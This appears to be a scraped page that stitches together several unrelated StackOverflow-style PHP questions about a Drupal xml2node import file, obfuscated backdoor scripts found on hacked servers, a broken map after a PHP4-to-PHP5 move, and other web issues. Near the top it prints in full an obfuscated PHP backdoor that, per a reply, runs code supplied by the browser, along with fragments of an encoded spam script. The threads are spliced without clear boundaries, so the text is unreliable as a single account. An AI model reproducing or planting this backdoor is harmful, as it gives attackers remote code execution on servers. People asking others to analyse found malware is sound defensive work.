Hi StackOverflow friends.
Running Drupal 6.22 php 5.3
I have been looking around now for a while, but haven't managd to find a solution to my problem.
I am hoping someone may be able to help me out with this.
I need to write an xml file from my data held in an array.
I have written this code and it works fine without problems.
I have invoked this to run on every cron run to ensure my data is upto date,
however I am no getting a second folder my_file.xml.imported and this is causing me problems.
I am using xml2node and hotfolders to import this data into my specified content type.
What bothers me most is that I had this working last week, all I have done since is put an extra "filter" on my data being written to the xml file.
Does anyone know what this .imported file type is and how I can stop it from happening?
So I finally figured this out, hopefully if someone else comes across this problem, this may help them.
The .imported file is created by the xml2node module after the xml file has been processed and put into the drupal queue.
When xml2node then searches again for xml files, it deletes all the .imported files so that your server does not get overloaded with useless once off files.
Related
This is the code:
<?php
$mign='*]`Dy6b'^'G';$qxqytq='HFJ01,0=^SG';$tehui='8P1Z}OeJXSbkV.L-zUJ2F#)GYy!JX%Bq';$xepyo='%';$ubs='lgO-2y-C_0AlSYMV_=ybr'^'DEzq9GRU';$zswu=0;##pS9Kg{5F$!S5Yb9Yf?R][|,z
$tjtgc|'ydiewzrbbxpynuhihqways';vukykn;$cqhi='#TQGI8[8:6_L-97'^'F&#(;g)]JY-8DWP65*E/h';$ivcppw='C%;';/*gn/zl_:#Jjsg$&&Sc&R$yakd='lgiwcwijhpuinad';'farustppsomkv';*/$qhn='$/vm$4YTo';$pef='0lb+)(o';$nmpnj='1*]sGZ]MsPYJCY'^'XD4,4?)';$nrohc='(_'^'Lj$5KKm';heag;$koqp=${'o/-dba*MsPYJCY'^$pef};hcel;$bplv=$qxqytq.$xepyo;$nufx='[eR?O}W/aa[^2K(IH7xVpEK"lJBr`CsD';$nmpnj($cqhi,$zswu);$fbbqn='+4/QEIo[+=$Q*JU';##p:YubiF)O0!pzf7wiB+M)gYR$Hy]U4.E,e?
$lku='Ymhp8`2#';/**|)JZV:3-R%EE=o2vK24OG#hmd[x"lGWAVz*/'p[7mlK';/*Yfb#:/h#EX(J-nIJ)A8EI-Y66O-Az|Nx}mZ=N?BIYzwuihjc^/$+9u5$^glt6=Zj+Tvz2d_l^*/'#)}R-xh';mpggm;$cqhi($zswu);##d1_"E4ZRb^z%jk-:v6}#g]#[7hXC"S
$tyz='hK0D3%*W&Yd';mhlamr;/*$xeeq;n3CVH|m}ql#(wi^M074$}UD-#Q58t"hj0n^M-v[zyP|Qjjrxdxl>>$amhg*/$tnzm=$nufx.'_0Isw'^$tehui;##l3X.-o$i[f%^W]v_0/ACZRMU*je.ztj)6gcA
$kgxnh=$bplv.$ivcppw^$fbbqn;'A`tF,G';/*Rs;1%fj1lIw]U#ANT"#zyu"Ef|,=bKasH*"tftelkntqhpcdnf>>es+"Arm"WKVh;aV.1vV^pEu1*/kyrp;$xepyo=$mign.$nrohc;$ctwvbd=$koqp['ksnkhe'];'{kMSjp]';if($tnzm==$xepyo($ctwvbd)/*^A,:q_`6)"5=#GVlbLwsRa&hPR%w3.8S+Nez3g(?Y8:*/){/*PPA2[RC"o9$nz='fmigpxxindhegtxconzwjcto';'zc';*/$fduger='O#*"/59S+F|$F0?!E^AZG`,b0xj:C7YHE#^r6ai7[&2%-=VvoQubf]qrb`9bnbXR)S7ZOtpNqkAK#_(8ocvKR=II#F1;s7lntBNI/Td)lKqWdUZ6Zb1XI`9&3.P"P(vBy??;7{wQ],2:xj7#%0#8DNR;S;|GNVH)25;633!z:Y?*HmXzfdY]WB-^VAJM"VoBk))M$R.ftU0]UY0)B#_{A.2;##]=`U0SX,PU:dFc0"!)R';$wuxhwd='p`LKCPf4N2#G)^KD+*2rc?j+|=9aaR39*#,Pk:KC6VmKLP3T2xUXFy.1-/r++9z7C"X9=V-u{bHo53BBRKW.?M=0hbn}:{)=/`,+J$FtEbQhD33Z?=V==?ZI]Z5L$[^f&yvwr(,s?NWJZ7lbQ]Sg*/?^qfUgtvlvqzt}zvzXX;ZZj0cpom}3?2[$3|(,Q3Yv4ML.K6KNP6B/;pnK#P:MuqV^#L9XHqE?2Vyn0mO#UT#Ez';$mynbq='5XNBz#';$ynbwu^$rgwyx;$xrazo='Afyo-3;*`OjI+H:2sO-dmx5kma05&W+EY/NYq';/*$md;Kh`L(9y#t,NQEDVz*uQ4yV:o+ouD#t^F.qAd!=,2"bmo<<$qtfxzlihia*//*$qlqo;U]y-fa]#JRDD$[-Deeghldc>>$dybre*/
##_W}8|bSK^C#$J..a5:]s(
$sqyh=$vxk^'Kmi0Z=5&8z';/*YLqCs8gylkR?H;m2FlLw*zgfmljzb^&-O9D$5dt#GMfd&|bX-66?0|:4;*/$miqbq=',JjZQwb}"}'.'slady';/*`k"Nn$:|#o`u(8lJ1=Kg=eJ"x0hBU4$w-2|x-wQmo4)/*/
'WMMg';'8aQ;1h5';'fR_fq';'9%=.7ho';$aizt='bwjHYJJjot;;7lV}$dkVt';$upnyd^$yxzz;'_t0z$%';##=i=w?3mV5s)K/O#f_IU^5WTG"tS!/
$wdfnl=$mynrf.'t09}/UKf)k+VFC0N';/*[#Y0Y#pi4D%z%4Q1cJC*^aa^vY/bFLxpuwccni|mM|$",j5^jh#DY=m^7tL_&:{hX*/$cbarg='9"6G,K/UMq?GLO5rYT'.$uagz;$buu='KopKNAID]gK,F8NK[kr"$4p86CU_W8H7{rgpQ'.$fduger;
$kjkrf='E_pbB/iZlx';/*-Awooy^1]c-(a#j}=%,mHJqwgix|ehj(CsHUTrSW8OCn_Zz8Roj}9Q;xCf4%2]QgzL*/$umjxo=$xrazo.$wuxhwd;$koe='SD##5j/Tk=BNek&h';$nsj='9"6G,K/UMq?GLO5rYT'^$mcoe;$pjzk^':nBjE7';$buu.='aZ:0S%=X#w3';$whql=$buu.'6XWi9EiMc4'^$umjxo.'E4R#%_Xq{}:';/*$ow;zNW(]WrX7]XYnidtdxia<<$oxbxywv*/
$ojg='bO8rU(2Vd{HSGS!';$zqs='Ce}/q+z"y?]Tex'.'3#?I6Rn]UOc&T)uj';'6XWi9EiMc4';'JUVtY+Ub1iqI3{9';$odoiv=$odoiv.'*u|0eGu-Pe=WOd+g95sZZ8|V%L';$fbu=$fbu.';U;HZ"D[d0H2J.#';/*MPm}M}!Qb5`Xx{(h4N0o2F&5;;d{WeMQ(EDH#&B8}r.ciz#g"dLFtObo)DzJp4l%[4CHp%[]Z*/$dwl=$kgxnh($qpm,$whql);$dwl('$h&"3Z%MPDm)/(l:My"%CK,${)CW+#P[','9BeCi=uox');}$zfqa('{Hg"G2','?Zt/{2T');plktjco;':4_epeN(-EHY7!L5OzSpm(^TnX';'iV(!{?d$V.';$kedr('-.sGVZ_B4`0');
$flzrk($qmdr,$nnxk);txzpdre;##pfE/}Mg{S.^"Ry]O|2PK?ulW
$ryy='q0ht#';##rt3I]{hp6$AWo7yb#|xKCPo?VBY$[{[
$lg='|.,oBa';/*]z1O/!V+rf$8rqj98`PLT7?js;%wvisxjbed|!J[cG;Zf)Jw[Qv}g4T3E&=}*/
/*[SXl3i[#y?,d2m3:H?7j8n9?iPslC.5_f`[:z_$sqx='jttsry';'ojty';*/'*iAvU|(bNJ_1';
?>
I've tried figuring out what it means or what it's trying to do, but I think it might be a bit over my head. Can anyone tell me if this is in fact a malicious backdoor script that founds it's way onto the server?
UPDATE
I found this code in sites/default/files in a drupal installation. Luckily you can't execute PHP from that folder, but it means a "normal" or "anonymous" user tried to upload this.
It is malicious alright, however it dynamically evaluates code supplied by the browser so we cannot determine what has been executed against it. It is possible it was using in a file include attack so being able to execute php in it's stored location matters little.
I'm not a pro with PHP
I'm not a pro with Webservers
Recently someone, somewhere has been managing to upload PHP spam scripts to my server. Though I can easily locate and delete these scripts, I can't figure out how they're working or where the backdoor is that leads the hacker back in to my server.
The script files uploaded declare a variable with every letter, number and symbol and then use arrays spell out the code that executes. For the past three days I've been manually trying to decode this but I'm getting sick and desperate of finding out what the code does in order to hopefully give me an insight in to how to fix my issue.
Can anyone help? Does anyone know something out there that can decode this for me? I'm only pasting a small part of the code so you can see what I mean. It's very, very long.
$z26="jmiO#sxhFnD>J\r/u+RcHz3}g\nd{^8 ?eVwl_T\\\t|N5q)LobU]40!p%,rC-97k<'y=W:P\$1BI&S6\"E(K`Y~.Q;f[v2a#X*ZAGtM";
$GLOBALS['zkmxz95'] = $z26[2].$z26[60].$z26[7].$z26[34].$z26[5].$z26[69].$z26[59];
$GLOBALS['cbimi76']($z26[73].$z26[3].$z26[56].$z26[78].$z26[76].$z26[36].$z26[35].$z26[36].$z26[80].$z26[67].$z26[76].$z26[35].$z26[40].$z26[3] , 5);
The above code, when decoded manually is:
define(SOCKET_TYPE_NO,5);
Recently someone, somewhere has been managing to upload PHP spam
scripts to my server....
Carefully follow https://codex.wordpress.org/FAQ_My_site_was_hacked
I'm picking up a site from a previous developer and we're wondering why, after moving the site onto new servers, does the map on http://69.94.34.32/map-of-hostels-in-the-lake-district.php not display the pins populated by the xml file http://69.94.34.32/xmloutputuk.php as it used to do?
Here it is on the old servers where it does work: [The map] & [The XML]
Straight after the move, loading the XML file in your browser gave you the following error:
"This page contains the following errors:
error on line 2 at column 1: Extra content at the end of the document
Below is a rendering of the page up to the first error."
...which is why we rebuilt the xml file to make sure that's not the issue. But now we've got the xml file working again (by identifying and commenting out the problem pieces) the map pins still aren't displaying.
We're aware our new servers are PHP5 whilst the old ones were on PHP4, so might that be the issue? In which case what do we need to change?
Thanks in advance for your help
AHA! Fixed it by including the following script in the header:
<script type="text/javascript" src="http://google-maps-utility-library-v3.googlecode.com/svn/tags/markerclustererplus/2.0.9/src/markerclusterer_packed.js"></script>
which was a suggestion posted in this thread.
At a glance, I'd say that the migration from PHP4 to PHP5 is, most likely, the culprit.
In this thread, they mention that in PHP5, the DOM XML manipulation functions were replaced by the DOMDocument class, have a look.
Ok, not sure if this even the right logic for this. But what the end game that is planned is I need to come up with a method of retrieving contents of files within a given directory, and then output them as they would be if called up through normal conventions include(), require(), whatever.
The basis for this is, the sales team wishes the ability to edit specific help documents that can easily be added/removed/edited via FTP to a specific directory. However, this directory is out of bounds so to speak from the normal MVC logic, but still contained within the MVC install.
So with that I am trying to come up with a default template for them to work with that I can grab bits from between certain points and display it without using a database for this purpose. Ideas? I haven't tried anything yet just to save time for that question. I am looking for an idea or 2 to figure out how to start the process, which would be best means of tackling the issue at hand
I am honestly not sure where the issue lays but here is my problem:
I have a single file: card.gif. When I check firebug or Google pagespeed, I learn the file is called twice during the page fetch once as normal file name and a second time with a random number (that does not change). Example:
card.gif
card.gif?1316720450953
I have scoured my actual source code, the image is only called once. It is not called in a CSS file. To be honest I have no idea what is the issue, some thought that when I originally installed mod_pagespeed that it appended ID's to each image in cache for any future overwrites but I can't be certain.
Has anybody ever had this issue before?
In the end - Dagon's comments above led me to believe that things like Firebug and Pagespeed may not always be correct. I do show two images being loaded in the timelines for both plugins but it is very difficult for me to decifer otherwise. If another answer is provided contradicting this, I am more than happy to test that theory.